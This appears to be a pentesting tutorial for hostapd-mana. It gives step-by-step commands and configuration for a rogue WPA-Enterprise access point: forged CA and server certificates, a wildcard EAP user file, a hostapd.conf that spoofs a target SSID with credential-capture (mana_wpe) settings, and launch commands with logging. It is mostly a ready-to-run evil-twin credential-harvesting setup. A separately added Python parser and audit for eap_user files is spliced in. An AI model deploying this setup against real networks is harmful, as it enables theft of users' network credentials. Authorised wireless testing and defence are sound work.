# hostapd-mana

hostapd-mana is great for pentesting WPA-Enterprise networks.
## Create a working directory

Create a working directory and navigate to it:

```sh
mkdir -p ~/mana/certs
cd ~/mana/certs
```
## Generate certificates and keys

Generate the CA private key and certificate:

```sh
openssl genrsa -out ca.key 2048
openssl req -x509 -new -nodes -key ca.key -sha256 -days 3650 -out ca.pem \
  -subj "/C=US/ST=SomeState/L=SomeCity/O=SomeOrgName/OU=SomeDepartment/CN=ACME CO Name Root CA"
```

Generate the server private key and certificate signing request:

```sh
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr \
  -subj "/C=US/ST=SomeState/L=SomeCity/O=SomeOrgName/OU=IT Department/CN=toteslegitwifi.companyname.com"
```

Sign the server certificate with our CA:

```sh
openssl x509 -req -in server.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.pem -days 365 -sha256
```

Generate DH parameters:

```sh
openssl dhparam -out dhparam.pem 2048
```

Supplicants that validate the RADIUS server certificate against a configured CA and expected server name will reject this self-signed chain; only clients that skip validation, or whose users accept an untrusted certificate, complete the EAP handshake.
## Create EAP user file

Create the EAP user configuration file (the first line accepts any phase-1 identity, the second defines the phase-2 user `t`):

```sh
echo '* PEAP,TTLS,TLS,MD5,GTC' > hostapd.eap_user
echo '"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]' >> hostapd.eap_user
```
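As an added example (not code from this page or from hostapd-mana), here is a small Python parser and audit for the hostapd.eap_user format used above; the sample file contents, the `EapUser` record and the audit rules are my own constructions.

```python
import re
from collections import namedtuple

# Constructed sample (not a file from this page): the two entries above plus one hashed user.
SAMPLE_EAP_USER = """\
# phase 1 (outer) identities
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]
"alice@example.com" MSCHAPV2 hash:0123456789abcdef0123456789abcdef [2]
"""
# identity (* or quoted), method list, optional password (quoted or NT hash), optional [2]
LINE_RE = re.compile(
    r'^(?P<ident>\*|"[^"]*")\s+(?P<methods>[A-Z0-9-]+(?:,[A-Z0-9-]+)*)'
    r'(?:\s+(?P<pw>"[^"]*"|hash:[0-9a-fA-F]{32}))?(?:\s+(?P<phase>\[2\]))?$'
)
# Inner methods carrying the password in the clear (PAP, GTC) or as a weaker challenge-response than MSCHAPv2
WEAK_INNER = {"TTLS-PAP", "GTC", "TTLS-CHAP", "TTLS-MSCHAP", "MD5"}
# identity is None for the "*" wildcard; password is a cleartext str, a hex NT hash
# when password_is_hash is True, or None; phase2 is True for entries marked [2]
EapUser = namedtuple("EapUser", "identity methods password password_is_hash phase2")

def parse_eap_user(text):
    users = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):   # hostapd skips blank and comment lines
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: unparseable entry {line!r}")
        pw = m["pw"]
        is_hash = bool(pw and pw.startswith("hash:"))
        users.append(EapUser(None if m["ident"] == "*" else m["ident"][1:-1],
                             m["methods"].split(","),
                             None if pw is None else (pw[5:] if is_hash else pw[1:-1]),
                             is_hash, m["phase"] is not None))
    return users

def audit(users):
    # Findings a reviewer of an EAP server's user file would want flagged
    findings = []
    for u in users:
        who = "*" if u.identity is None else u.identity
        if u.identity is None and not u.phase2:
            findings.append("wildcard phase-1 identity: any outer identity is accepted")
        if u.password is not None and not u.password_is_hash:
            findings.append(f"{who}: password stored in cleartext (store an NT hash via hash: instead)")
        weak = sorted(WEAK_INNER & set(u.methods))
        if u.phase2 and weak:
            findings.append(f"{who}: weak inner methods allowed: {','.join(weak)}")
    return findings
```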
## Configure hostapd.conf

This needs to be tuned for your specific environment:

```
interface=NAME-OF-YOUR-WIFI-INTERFACE
ssid=SSID-TO-SPOOF
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
auth_algs=3

# 802.1X configuration
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user

# Certificate configuration (the CA that signed server.pem, the server certificate and its key)
ca_cert=ca.pem
server_cert=server.pem
private_key=server.key
# left empty because server.key was generated without a passphrase
private_key_passwd=
dh_file=dhparam.pem

# MANA specific settings
enable_mana=1
mana_wpe=1
mana_eapsuccess=1
```
## Kill any interfering processes

```sh
sudo airmon-ng check kill
```

Configure the interface (use the same interface name as in hostapd.conf):

```sh
sudo ip link set NAME-OF-YOUR-WIFI-INTERFACE down
sudo iw dev NAME-OF-YOUR-WIFI-INTERFACE set type monitor
sudo ip link set NAME-OF-YOUR-WIFI-INTERFACE up
```

Stop NetworkManager (optional but recommended, so it does not reconfigure the interface underneath hostapd):

```sh
sudo systemctl stop NetworkManager
```
## Run hostapd-mana

```sh
sudo hostapd hostapd.conf
```

Run with a log file (here `hostapd/hostapd` is the binary built inside the hostapd-mana source tree):

```sh
sudo hostapd/hostapd hostapd.conf | tee -a log.log
```